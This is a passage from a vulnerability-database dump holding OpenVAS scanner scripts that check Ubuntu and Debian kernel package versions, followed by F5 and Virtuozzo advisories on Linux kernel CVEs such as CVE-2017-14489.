dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU17.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.13.0-1006-raspi2\", ver:\"4.13.0-1006.6\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.13.0-17-generic\", ver:\"4.13.0-17.20\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.13.0-17-generic-lpae\", ver:\"4.13.0-17.20\", rls:\"UBUNTU17.10\")) 
!= NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.13.0-17-lowlatency\", ver:\"4.13.0-17.20\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"4.13.0.17.18\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae\", ver:\"4.13.0.17.18\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"4.13.0.17.18\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-raspi2\", ver:\"4.13.0.1006.4\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-09T19:17:21", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-11176", "CVE-2017-1000380", "CVE-2017-1000111", "CVE-2017-14489", "CVE-2017-7889", "CVE-2017-14106", "CVE-2017-14140", "CVE-2017-10661", "CVE-2017-1000251", "CVE-2017-10911", "CVE-2017-7482", "CVE-2017-14156", "CVE-2017-14340", "CVE-2017-12134", "CVE-2017-12153", "CVE-2017-1000363", "CVE-2017-7542", "CVE-2017-12154", "CVE-2017-11600", "CVE-2017-1000365"], "description": "Several vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation, denial of service or information\nleaks.\n\nCVE-2017-7482\n\nShi Lei discovered that RxRPC Kerberos 5 ticket handling code does\nnot properly verify metadata, leading to information disclosure,\ndenial of service or potentially execution of arbitrary code.\n\nCVE-2017-7542\n\nAn integer overflow vulnerability in the ip6_find_1stfragopt()\nfunction was found allowing a local attacker with privileges to open\nraw sockets to cause a denial of 
service.\n\nCVE-2017-7889\n\nTommi Rantala and Brad Spengler reported that the mm subsystem does\nnot properly enforce the CONFIG_STRICT_DEVMEM protection mechanism,\nallowing a local attacker with access to /dev/mem to obtain\nsensitive information or potentially execute arbitrary code.\n\nDescription truncated. Please see the references for more information.\n\nFor Debian 7 ", "modified": "2020-06-08T00:00:00", "published": "2018-02-07T00:00:00", "id": "OPENVAS:1361412562310891099", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891099", "type": "openvas", "title": "Debian LTS: Security Advisory for linux (DLA-1099-1)", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891099\");\n script_version(\"2020-06-08T06:52:36+0000\");\n script_cve_id(\"CVE-2017-1000111\", \"CVE-2017-1000251\", \"CVE-2017-1000363\", \"CVE-2017-1000365\", \"CVE-2017-1000380\", \"CVE-2017-10661\", \"CVE-2017-10911\", \"CVE-2017-11176\", \"CVE-2017-11600\", \"CVE-2017-12134\", \"CVE-2017-12153\", \"CVE-2017-12154\", \"CVE-2017-14106\", \"CVE-2017-14140\", \"CVE-2017-14156\", \"CVE-2017-14340\", \"CVE-2017-14489\", \"CVE-2017-7482\", \"CVE-2017-7542\", \"CVE-2017-7889\");\n script_name(\"Debian LTS: Security Advisory for linux (DLA-1099-1)\");\n script_tag(name:\"last_modification\", value:\"2020-06-08 06:52:36 +0000 (Mon, 08 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-02-07 00:00:00 +0100 (Wed, 07 Feb 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.7\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:S/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2017/09/msg00017.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n\n script_tag(name:\"affected\", value:\"linux on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 7 'Wheezy', these problems have been fixed in version\n3.2.93-1. 
This version also includes bug fixes from upstream versions\nup to and including 3.2.93.\n\nFor Debian 8 'Jessie', these problems have been fixed in version\n3.16.43-2+deb8u4 or were fixed in an earlier version.\n\nFor Debian 9 'Stretch', these problems have been fixed in version\n4.9.30-2+deb9u4 or were fixed in an earlier version.\n\nWe recommend that you upgrade your linux packages.\");\n\n script_tag(name:\"summary\", value:\"Several vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation, denial of service or information\nleaks.\n\nCVE-2017-7482\n\nShi Lei discovered that RxRPC Kerberos 5 ticket handling code does\nnot properly verify metadata, leading to information disclosure,\ndenial of service or potentially execution of arbitrary code.\n\nCVE-2017-7542\n\nAn integer overflow vulnerability in the ip6_find_1stfragopt()\nfunction was found allowing a local attacker with privileges to open\nraw sockets to cause a denial of service.\n\nCVE-2017-7889\n\nTommi Rantala and Brad Spengler reported that the mm subsystem does\nnot properly enforce the CONFIG_STRICT_DEVMEM protection mechanism,\nallowing a local attacker with access to /dev/mem to obtain\nsensitive information or potentially execute arbitrary code.\n\nDescription truncated. Please see the references for more information.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n3.2.93-1. 
This version also includes bug fixes from upstream versions\nup to and including 3.2.93.\n\nFor Debian 8 'Jessie', these problems have been fixed in version\n3.16.43-2+deb8u4 or were fixed in an earlier version.\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"linux-doc-3.2\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-486\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-686-pae\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-amd64\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-armel\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-armhf\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-i386\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-amd64\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-common\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-common-rt\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-iop32x\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-ixp4xx\", 
ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-kirkwood\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-mv78xx0\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-mx5\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-omap\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-orion5x\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-rt-686-pae\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-rt-amd64\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-versatile\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-vexpress\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-5-486\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-5-686-pae\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-5-all\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-5-all-amd64\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-5-all-armel\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-5-all-armhf\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-5-all-i386\", 
ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-5-amd64\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-5-common\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-5-common-rt\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-5-iop32x\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-5-ixp4xx\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-5-kirkwood\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-5-mv78xx0\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-5-mx5\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-5-omap\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-5-orion5x\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-5-rt-686-pae\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-5-rt-amd64\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-5-versatile\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-5-vexpress\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-486\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-686-pae\", ver:\"3.2.93-1\", 
rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-686-pae-dbg\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-amd64\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-amd64-dbg\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-iop32x\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-ixp4xx\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-kirkwood\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-mv78xx0\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-mx5\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-omap\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-orion5x\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-rt-686-pae\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-rt-686-pae-dbg\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-rt-amd64\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-rt-amd64-dbg\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-versatile\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-vexpress\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += 
res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-5-486\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-5-686-pae\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-5-686-pae-dbg\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-5-amd64\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-5-amd64-dbg\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-5-iop32x\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-5-ixp4xx\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-5-kirkwood\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-5-mv78xx0\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-5-mx5\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-5-omap\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-5-orion5x\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-5-rt-686-pae\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-5-rt-686-pae-dbg\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-5-rt-amd64\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-5-rt-amd64-dbg\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = 
isdpkgvuln(pkg:\"linux-image-3.2.0-5-versatile\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-5-vexpress\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-manual-3.2\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-source-3.2\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-support-3.2.0-4\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-support-3.2.0-5\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xen-linux-system-3.2.0-4-686-pae\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xen-linux-system-3.2.0-4-amd64\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xen-linux-system-3.2.0-5-686-pae\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xen-linux-system-3.2.0-5-amd64\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.7, "vector": "AV:A/AC:L/Au:S/C:C/I:C/A:C"}}], "f5": [{"lastseen": "2019-05-08T18:21:23", "bulletinFamily": "software", "cvelist": ["CVE-2017-14489"], "description": "\nF5 Product Development has assigned ID Installer-3041 (Traffix) to this vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | 
Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1 | Not vulnerable | None \nBIG-IP AAM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 | Not vulnerable | None \nBIG-IP AFM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 | Not vulnerable | None \nBIG-IP Analytics | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1 | Not vulnerable | None \nBIG-IP APM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1 | Not vulnerable | None \nBIG-IP ASM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1 | Not vulnerable | None \nBIG-IP DNS | None | 13.0.0 \n12.0.0 - 12.1.2 | Not vulnerable | None \nBIG-IP Edge Gateway | None | 11.2.1 | Not vulnerable | None \nBIG-IP GTM | None | 11.4.1 - 11.6.1 \n11.2.1 | Not vulnerable | None \nBIG-IP Link Controller | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1 | Not vulnerable | None \nBIG-IP PEM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 | Not vulnerable | None \nBIG-IP PSM | None | 11.4.1 | Not vulnerable | None \nBIG-IP WebAccelerator | None | 11.2.1 | Not vulnerable | None \nBIG-IP WebSafe | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 | Not vulnerable | None \nARX | None | 6.2.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | None | 3.1.1 | Not vulnerable | None \nBIG-IQ Cloud | None | 4.4.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Device | None | 4.4.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Security | None | 4.4.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ ADC | None | 4.5.0 | Not vulnerable | None \nBIG-IQ Centralized Management | None | 5.0.0 - 5.3.0 \n4.6.0 | Not vulnerable | None \nBIG-IQ Cloud and Orchestration | None | 1.0.0 | Not vulnerable | None \nF5 iWorkflow | None | 2.0.0 - 2.3.0 | Not vulnerable | None \nLineRate | None | 2.5.0 - 2.6.2 | Not vulnerable | None \nTraffix SDC | 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0 | None | Low | Linux kernel\n\nIf you are running a version 
listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n", "edition": 1, "modified": "2017-10-04T00:57:00", "published": "2017-10-04T00:57:00", "id": "F5:K71796229", "href": "https://support.f5.com/csp/article/K71796229", "title": "Linux kernel vulnerability CVE-2017-14489", "type": "f5", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "virtuozzo": [{"lastseen": "2019-11-05T11:27:52", "bulletinFamily": "unix", "cvelist": ["CVE-2017-14489"], "description": "The cumulative Virtuozzo ReadyKernel patch was updated with security fixes. 
The patch applies to Virtuozzo kernel 3.10.0-327.18.2.vz7.15.2 (Virtuozzo 7.0.0).\n**Vulnerability id:** PSBM-72405\nAn unprivileged user inside a container could cause a denial of service (kernel crash in user_read() function) using a specially crafted sequence of system calls.\n\n**Vulnerability id:** CVE-2017-14489\nThe iscsi_if_rx function in drivers/scsi/scsi_transport_iscsi.c in the Linux kernel through 4.13.2 allows local users to cause a denial of service (panic) by leveraging incorrect length validation.\n\n", "edition": 1, "modified": "2017-09-21T00:00:00", "published": "2017-09-21T00:00:00", "id": "VZA-2017-082", "href": "https://help.virtuozzo.com/customer/portal/articles/2878782", "title": "Important kernel security update: CVE-2017-14489 and other; Virtuozzo ReadyKernel patch 31.1 for Virtuozzo 7.0.0", "type": "virtuozzo", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-11-05T11:28:17", "bulletinFamily": "unix", "cvelist": ["CVE-2017-14489"], "description": "The cumulative Virtuozzo ReadyKernel patch was updated with security fixes. The patch applies to Virtuozzo kernels 3.10.0-327.36.1.vz7.18.7 (Virtuozzo 7.0.1), 3.10.0-327.36.1.vz7.20.18 (Virtuozzo 7.0.3), 3.10.0-514.16.1.vz7.30.10 (Virtuozzo 7.0.4), 3.10.0-514.16.1.vz7.30.15 (Virtuozzo 7.0.4 HF3), and 3.10.0-514.26.1.vz7.33.22 (Virtuozzo 7.0.5).\n**Vulnerability id:** PSBM-71747\nChunYu Wang from Red Hat found a netlink use-after-free issue by syzkaller. 
Access to already freed memory (groups in struct netlink_sock) could cause host crash or memory corruption.\n\n**Vulnerability id:** PSBM-72405\nAn unprivileged user inside a container could cause a denial of service (kernel crash in user_read() function) using a specially crafted sequence of system calls.\n\n**Vulnerability id:** CVE-2017-14489\nThe iscsi_if_rx function in drivers/scsi/scsi_transport_iscsi.c in the Linux kernel through 4.13.2 allows local users to cause a denial of service (panic) by leveraging incorrect length validation.\n\n", "edition": 1, "modified": "2017-09-21T00:00:00", "published": "2017-09-21T00:00:00", "id": "VZA-2017-083", "href": "https://help.virtuozzo.com/customer/portal/articles/2878783", "title": "Important kernel security update: CVE-2017-14489 and other; Virtuozzo ReadyKernel patch 31.1 for Virtuozzo 7.0.1, 7.0.3, 7.0.4, 7.0.4 HF3, 7.0.5", "type": "virtuozzo", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-06-04T16:40:33", "bulletinFamily": "unix", "cvelist": ["CVE-2017-14489", "CVE-2017-1000251"], "description": "This update provides the new kernel 2.6.32-042stab125.1 for Virtuozzo 6.0 based on the Red Hat Enterprise Linux 6.9 kernel 2.6.32-696.10.2.el6. This update inherits a security fix from the original RHEL kernel and provides internal security fixes.\n**Vulnerability id:** PSBM-72416\nKernel crash due to missing error handling for negatively instantiated keys.\n\n**Vulnerability id:** CVE-2017-1000251\nA stack buffer overflow flaw was found in the way the Bluetooth subsystem of the Linux kernel processed pending L2CAP configuration responses from a client. On systems with the stack protection feature enabled in the kernel an unauthenticated attacker able to initiate a connection to a system via Bluetooth could use this flaw to crash the system. 
